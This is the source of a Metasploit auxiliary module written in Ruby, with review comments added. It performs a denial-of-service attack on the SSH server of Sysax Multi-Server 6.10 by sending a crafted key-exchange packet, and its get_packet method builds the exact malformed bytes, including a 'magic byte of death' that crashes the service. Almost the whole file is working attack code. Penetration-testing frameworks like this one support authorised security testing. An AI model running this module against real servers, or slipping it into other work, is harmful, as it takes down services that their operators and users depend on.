Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Denial-of-service auxiliary module against the Sysax Multi-Server 6.10 SSHD.
#
# Flow (see #run): open one TCP connection to RPORT, read the server's banner,
# send a client version line followed by the fixed byte sequence built by
# #get_packet, attempt one more read, and disconnect. Stability is declared as
# CRASH_SERVICE_DOWN in the module metadata.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',
        'Description' => %q{
          This module sends a specially-crafted SSH Key Exchange causing the service to
          crash.
        },
        'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '92081'],
          [ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']
        ],
        'DisclosureDate' => '2013-03-17',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # Default SSH port.
        Opt::RPORT(22),
        # Appended verbatim to the 'SSH-2.0-OpenSSH_5.1p1 ' client banner in #run.
        OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])
      ]
    )
  end

  # Builds the byte string sent after the client version banner.
  #
  # The fixed header is packed as raw bytes: a 4-byte value 0x00000314, then
  # 0x08 and 0x14, 16 further bytes, and 0x0000007e (126) immediately before
  # 126 random alphanumeric bytes. Per the module description this mimics an
  # SSH key-exchange message (0x14 corresponds to SSH_MSG_KEXINIT); the
  # remaining fields are random alphanumeric runs separated by a 3-byte
  # all-zero `delimiter`.
  #
  # NOTE(review): the separators between the later runs are 3 bytes, not the
  # 4 a length-prefixed name-list would use, so if these are meant as KEXINIT
  # name-lists their length fields are skewed by the first byte of each run.
  # That, together with the 0x28 byte below, appears to be the malformed part
  # the vulnerable server fails on — confirm against the referenced write-up.
  #
  # @return [String] the packet bytes (binary, from Array#pack plus appended text)
  def get_packet
    delimiter = "\x00" * 3
    packet = [
      0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
      0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
      0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
      0x00, 0x7e
    ].pack('C*')
    packet << Rex::Text.rand_text_alphanumeric(126)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(16)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << "\x28" # Magic byte of death - seems to work with just about
                     # anything except \x1a, the value it's supposed to be
    packet << Rex::Text.rand_text_alphanumeric(26)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(27)
    # Trailing 21 zero bytes.
    packet << delimiter * 7
  end

  # Performs a single connection attempt.
  #
  # Reads whatever the server sends first (the SSH banner; empty string if
  # nothing arrives), sends 'SSH-2.0-OpenSSH_5.1p1 ' + CLIENTVERSION + CRLF
  # followed by #get_packet in one write, then tries one more read before
  # disconnecting.
  #
  # @return [void]
  def run
    connect

    # get_once is called with no explicit timeout here; the mixin default applies.
    banner = sock.get_once || ''
    print_status("Banner: 
#{banner.strip}")
    # NOTE(review): only the read below is guarded; if the peer has already
    # closed when this put runs, a write error would propagate — verify
    # whether the Tcp mixin handles that case.
    sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)

    # Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.
    # A reset here is the expected outcome (service down); it is logged, not raised.
    begin
      sock.get_once
    rescue Errno::ECONNRESET => e
      vprint_error(e.message)
    end

    disconnect
  end
end